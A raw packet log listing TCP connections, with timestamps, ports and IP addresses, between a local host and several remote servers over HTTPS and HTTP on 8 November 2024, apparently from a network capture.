Nov 8, 2024 16:15:33.765960932 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.766144991 CET	49760	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.766289949 CET	49760	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.766302109 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.767903090 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.768481970 CET	49758	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.768520117 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.768824100 CET	49758	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.768835068 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.774245977 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.774315119 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.774403095 CET	49757	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.774627924 CET	49757	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.774627924 CET	49757	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.774648905 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.774665117 CET	443	49757	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.777626038 CET	49761	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.777683973 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.777945042 CET	49761	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.778115988 CET	49761	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.778132915 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.824058056 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.824634075 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.824693918 CET	49755	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.824747086 CET	49755	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.824748039 CET	49755	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.824769974 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.824780941 CET	443	49755	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.827564001 CET	49762	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.827600002 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.827670097 CET	49762	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.827909946 CET	49762	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.827918053 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.831005096 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.831484079 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.831541061 CET	49756	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.831593037 CET	49756	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.831593037 CET	49756	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.831617117 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.831629992 CET	443	49756	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.833952904 CET	49763	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.834002018 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.834059954 CET	49763	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.834197044 CET	49763	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.834209919 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.898863077 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.898943901 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.899286985 CET	49758	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.902744055 CET	49758	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.902744055 CET	49758	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.902771950 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.902785063 CET	443	49758	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.922508955 CET	49764	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.922571898 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:33.922668934 CET	49764	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.922892094 CET	49764	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:33.922908068 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.280805111 CET	80	49752	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:34.282238960 CET	49765	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:34.282291889 CET	443	49765	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:34.282727003 CET	49765	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:34.282727003 CET	49765	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:34.282758951 CET	443	49765	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:34.330049038 CET	49752	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:34.517287016 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.518409014 CET	49760	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.518430948 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.519068956 CET	49760	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.519074917 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.524466991 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.525018930 CET	49761	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.525084019 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.525456905 CET	49761	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.525476933 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.559561968 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.560170889 CET	49762	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.560184002 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.561078072 CET	49762	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.561084032 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.563075066 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.563597918 CET	49763	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.563688040 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.564126015 CET	49763	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.564147949 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.648791075 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.648890018 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.648936987 CET	49760	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.649117947 CET	49760	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.649137974 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.649168968 CET	49760	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.649174929 CET	443	49760	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.651088953 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.651734114 CET	49766	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.651782036 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.651799917 CET	49764	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.651815891 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.651845932 CET	49766	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.652167082 CET	49764	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.652172089 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.652219057 CET	49766	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.652229071 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.661829948 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.661894083 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.661942005 CET	49761	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.662055969 CET	49761	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.662079096 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.662105083 CET	49761	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.662111998 CET	443	49761	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.664556026 CET	49767	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.664593935 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.664696932 CET	49767	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.664822102 CET	49767	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.664830923 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.688543081 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.688649893 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.688921928 CET	49762	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.688957930 CET	49762	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.688957930 CET	49762	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.688970089 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.688978910 CET	443	49762	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.691411018 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.691781998 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.691849947 CET	49763	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.691885948 CET	49763	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.691910028 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.691929102 CET	49763	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.691935062 CET	443	49763	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.692508936 CET	49768	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.692538023 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.692662954 CET	49768	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.692874908 CET	49768	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.692886114 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.694207907 CET	49769	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.694252968 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.694411993 CET	49769	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.694549084 CET	49769	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.694562912 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.781672001 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.781735897 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.781939983 CET	49764	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.782022953 CET	49764	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.782042980 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.782058001 CET	49764	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.782063961 CET	443	49764	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.786767960 CET	49770	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.786801100 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.786927938 CET	49770	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.787126064 CET	49770	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:34.787141085 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:34.890336990 CET	443	49765	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:34.892046928 CET	49765	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:34.892080069 CET	443	49765	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:35.047406912 CET	443	49765	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:35.047530890 CET	443	49765	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:35.047595024 CET	49765	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.048300028 CET	49765	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.079662085 CET	49752	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:35.085211039 CET	80	49752	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:35.085293055 CET	49752	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:35.089987993 CET	49771	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:35.094837904 CET	80	49771	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:35.095778942 CET	49771	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:35.096061945 CET	49771	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:35.100856066 CET	80	49771	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:35.239767075 CET	80	49759	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:35.241003036 CET	49772	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.241040945 CET	443	49772	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:35.241120100 CET	49772	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.241384983 CET	49772	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.241399050 CET	443	49772	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:35.283168077 CET	49759	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:35.391426086 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.392206907 CET	49766	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.392246008 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.392698050 CET	49766	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.392705917 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.398679018 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.399214029 CET	49767	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.399235964 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.399663925 CET	49767	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.399669886 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.421175003 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.421746016 CET	49769	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.421777964 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.422231913 CET	49769	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.422243118 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.439008951 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.440051079 CET	49768	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.440087080 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.440726042 CET	49768	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.440741062 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.514704943 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.515264988 CET	49770	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.515284061 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.515747070 CET	49770	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.515754938 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.521724939 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.521800041 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.521867037 CET	49766	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.522075891 CET	49766	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.522075891 CET	49766	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.522099018 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.522109985 CET	443	49766	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.524996996 CET	49773	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.525038004 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.525269032 CET	49773	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.525422096 CET	49773	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.525435925 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.528496981 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.529109001 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.529165983 CET	49767	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.529247999 CET	49767	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.529263973 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.529279947 CET	49767	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.529285908 CET	443	49767	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.531656027 CET	49774	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.531697989 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.531893015 CET	49774	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.531980038 CET	49774	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.532000065 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.550501108 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.550978899 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.551054955 CET	49769	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.551088095 CET	49769	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.551104069 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.551121950 CET	49769	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.551127911 CET	443	49769	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.553971052 CET	49775	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.554001093 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.554055929 CET	49775	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.554255962 CET	49775	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.554263115 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.575087070 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.575155020 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.575455904 CET	49768	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.575505972 CET	49768	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.575505972 CET	49768	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.575534105 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.575548887 CET	443	49768	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.577892065 CET	49776	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.577924967 CET	443	49776	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.578002930 CET	49776	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.578129053 CET	49776	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.578145027 CET	443	49776	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.642221928 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.642995119 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.643063068 CET	49770	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.643095970 CET	49770	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.643119097 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.643131018 CET	49770	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.643137932 CET	443	49770	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.646184921 CET	49777	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.646209955 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.646267891 CET	49777	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.646434069 CET	49777	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:35.646451950 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:35.749399900 CET	80	49771	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:35.750540018 CET	49778	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.750588894 CET	443	49778	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:35.750709057 CET	49778	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.751040936 CET	49778	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.751055002 CET	443	49778	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:35.798805952 CET	49771	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:35.860737085 CET	443	49772	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:35.862474918 CET	49772	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:35.862514973 CET	443	49772	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.004751921 CET	443	49772	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.004861116 CET	443	49772	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.004967928 CET	49772	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:36.005425930 CET	49772	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:36.010515928 CET	49779	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.015393019 CET	80	49779	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:36.015469074 CET	49779	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.015594959 CET	49779	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:36.020685911 CET	80	49779	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:36.259984970 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.260535002 CET	49774	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.260555983 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.261008978 CET	49774	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.261013985 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.269643068 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.270174026 CET	49773	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.270185947 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.270515919 CET	49773	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.270525932 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.287089109 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.287580013 CET	49775	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.287589073 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.288023949 CET	49775	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.288028955 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.298785925 CET	443	49776	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.301110029 CET	49776	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.301148891 CET	443	49776	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.301654100 CET	49776	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.301666021 CET	443	49776	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.360095024 CET	443	49778	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.361854076 CET	49778	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:36.361905098 CET	443	49778	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:36.388890982 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.388942003 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.388957977 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.389012098 CET	49774	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.389256001 CET	49774	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.389277935 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.389293909 CET	49774	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.389306068 CET	443	49774	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.389811039 CET	49777	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.389832020 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.390317917 CET	49777	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.390322924 CET	443	49777	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.392889977 CET	49780	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.392931938 CET	443	49780	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.393038988 CET	49780	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.393623114 CET	49780	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.393634081 CET	443	49780	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.401926041 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.402146101 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.402208090 CET	49773	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.402285099 CET	49773	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.402285099 CET	49773	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.402297974 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.402307987 CET	443	49773	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.405049086 CET	49781	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.405092001 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.405169010 CET	49781	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.405386925 CET	49781	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.405402899 CET	443	49781	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.417690039 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.417768002 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.417857885 CET	49775	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.418025017 CET	49775	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.418035030 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.418056965 CET	49775	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.418065071 CET	443	49775	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.421950102 CET	49782	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.421981096 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.422086954 CET	49782	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.422277927 CET	49782	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:36.422286034 CET	443	49782	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:36.427241087 CET	443	49776	13.107.246.45	192.168.2.10
